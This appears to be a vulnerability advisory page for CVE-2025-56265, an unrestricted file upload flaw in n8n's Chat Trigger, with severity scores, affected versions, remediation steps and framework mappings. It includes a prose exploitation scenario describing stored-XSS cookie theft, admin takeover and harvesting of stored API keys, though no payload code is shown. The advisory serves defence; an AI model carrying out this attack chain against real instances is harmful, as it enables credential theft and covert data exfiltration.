CVE-2025-56265: n8n unrestricted file upload RCE

CISO Take

N8N's Chat Trigger accepts unrestricted file uploads, allowing a low-privileged attacker to store crafted HTML that executes arbitrary code in admin browsers — public PoC is already available. Organizations using n8n for AI agent orchestration face full workflow compromise, including exposure of API keys for OpenAI, Anthropic, and any other connected service stored in the credential vault. Patch immediately or disable Chat Trigger nodes in all exposed workflows and rotate all stored credentials.

What is the risk?

High risk. CVSS 8.8 with network-accessible vector, low complexity, and low privileges required makes this trivially exploitable — script-kiddie territory given the public PoC. The Chat Trigger is architecturally designed to be internet-facing (it's a chatbot endpoint), which dramatically broadens the attack surface compared to internal-only components. N8N instances routinely hold credentials for LLM APIs, databases, cloud services, and communication platforms, making them high-value targets. Any organization running n8n as part of an AI pipeline that hasn't patched should treat this as an active incident.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
n8n	npm	—	No patch
193.4K OpenSSF 6.6 Pushed 3d ago 55% patched ~7d to patch Full package profile →

Do you use n8n? You're affected.

How severe is it?

CVSS 3.1

8.8 / 10

EPSS

0.6%

chance of exploitation in 30 days

Higher than 42% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

What should I do?

6 steps

PATCH

Upgrade n8n beyond affected versions (1.95.3, 1.100.1, 1.101.1) as soon as a fixed release is available; monitor github.com/n8n-io/n8n releases.
WORKAROUND

Disable Chat Trigger nodes in all workflows immediately; replace with authenticated webhook triggers if chat functionality is business-critical.
AUDIT

Inventory all n8n instances across the organization; identify which have Chat Trigger nodes and internet exposure.
ROTATE CREDENTIALS

If exploitation cannot be ruled out, treat all credentials stored in n8n as compromised — rotate LLM API keys, DB passwords, OAuth tokens, and webhook secrets.
DETECT

Review n8n server logs for unexpected file uploads to Chat Trigger endpoints; monitor for anomalous outbound connections from n8n hosts.
NETWORK CONTROLS

Place all n8n instances behind VPN or authentication proxy; never expose Chat Trigger directly to the public internet without additional access controls.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Data Extraction Auth Bypass Framework Agent Plugin AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0080 - AI Agent Context Poisoning AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.5 - AI system security controls

NIST AI RMF

MANAGE 2.2 - Risk treatments including risk sharing and residual risk management

OWASP LLM Top 10

LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2025-56265?

N8N's Chat Trigger accepts unrestricted file uploads, allowing a low-privileged attacker to store crafted HTML that executes arbitrary code in admin browsers — public PoC is already available. Organizations using n8n for AI agent orchestration face full workflow compromise, including exposure of API keys for OpenAI, Anthropic, and any other connected service stored in the credential vault. Patch immediately or disable Chat Trigger nodes in all exposed workflows and rotate all stored credentials.

Is CVE-2025-56265 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-56265, increasing the risk of exploitation.

How to fix CVE-2025-56265?

1. PATCH: Upgrade n8n beyond affected versions (1.95.3, 1.100.1, 1.101.1) as soon as a fixed release is available; monitor github.com/n8n-io/n8n releases. 2. WORKAROUND: Disable Chat Trigger nodes in all workflows immediately; replace with authenticated webhook triggers if chat functionality is business-critical. 3. AUDIT: Inventory all n8n instances across the organization; identify which have Chat Trigger nodes and internet exposure. 4. ROTATE CREDENTIALS: If exploitation cannot be ruled out, treat all credentials stored in n8n as compromised — rotate LLM API keys, DB passwords, OAuth tokens, and webhook secrets. 5. DETECT: Review n8n server logs for unexpected file uploads to Chat Trigger endpoints; monitor for anomalous outbound connections from n8n hosts. 6. NETWORK CONTROLS: Place all n8n instances behind VPN or authentication proxy; never expose Chat Trigger directly to the public internet without additional access controls.

What systems are affected by CVE-2025-56265?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chatbots, RAG pipelines, workflow automation, API integrations.

What is the CVSS score for CVE-2025-56265?

CVE-2025-56265 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.56%.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI chatbotsRAG pipelinesworkflow automationAPI integrations

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0053 AI Agent Tool Invocation

AML.T0080 AI Agent Context Poisoning

AML.T0081 Modify AI Agent Configuration

AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.5

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

An arbitrary file upload vulnerability in the Chat Trigger component of N8N v1.95.3, v1.100.1, and v1.101.1 allows attackers to execute arbitrary code via uploading a crafted HTML file.

Exploitation Scenario

Attacker discovers an internet-facing n8n instance with a public Chat Trigger endpoint — searchable via Shodan or similar. Using the chat interface with minimal or no authentication (PR:L in CVSS), attacker uploads a crafted HTML file containing JavaScript that exfiltrates session cookies to an attacker-controlled server. When an n8n administrator reviews the chat session or interaction logs, the stored XSS fires in their browser, stealing the admin session token. Attacker authenticates as admin, opens the credential manager, and harvests all stored API keys — OpenAI, Anthropic, Pinecone, Slack, database URIs. They then modify an existing AI agent workflow to silently exfiltrate all user queries and LLM responses to an external endpoint, effectively wiretapping the organization's AI pipeline without any further access requirements.

Weaknesses (CWE)

CWE-434 Unrestricted Upload of File with Dangerous Type

CWE-434 — Unrestricted Upload of File with Dangerous Type: The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.

[Architecture and Design] Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]
[Architecture and Design] When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Source: MITRE CWE corpus.